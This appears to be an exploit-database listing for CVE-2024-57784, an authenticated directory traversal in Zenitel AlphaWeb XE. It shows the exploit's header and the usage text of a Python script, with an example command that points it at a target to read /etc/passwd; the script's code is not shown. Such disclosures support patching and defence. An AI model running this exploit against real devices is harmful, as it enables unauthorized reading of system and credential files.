Share
## https://sploitus.com/exploit?id=3D9B93A4-129B-5DDF-85DB-4AD34DDF17BE
# CVE-2024-57784

```
[*] Exploit Title: Authenticated Directory Traversal Vulnerability on Zenitel AlphaWeb XE Version 11.2.3.10
[*] Date: 08/02/2025
[*] Exploit Author: Safvan Parakkal
[*] Vendor Website: https://www.zenitel.com/
[*] CVE: CVE-2024-57784

usage: CVE-2024-57784.py [-h] -u URL -f FILE

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -f FILE, --file FILE  The file to read

Example : python3 CVE-2024-57784.py -u http://192.168.10.34 -f /etc/passwd
```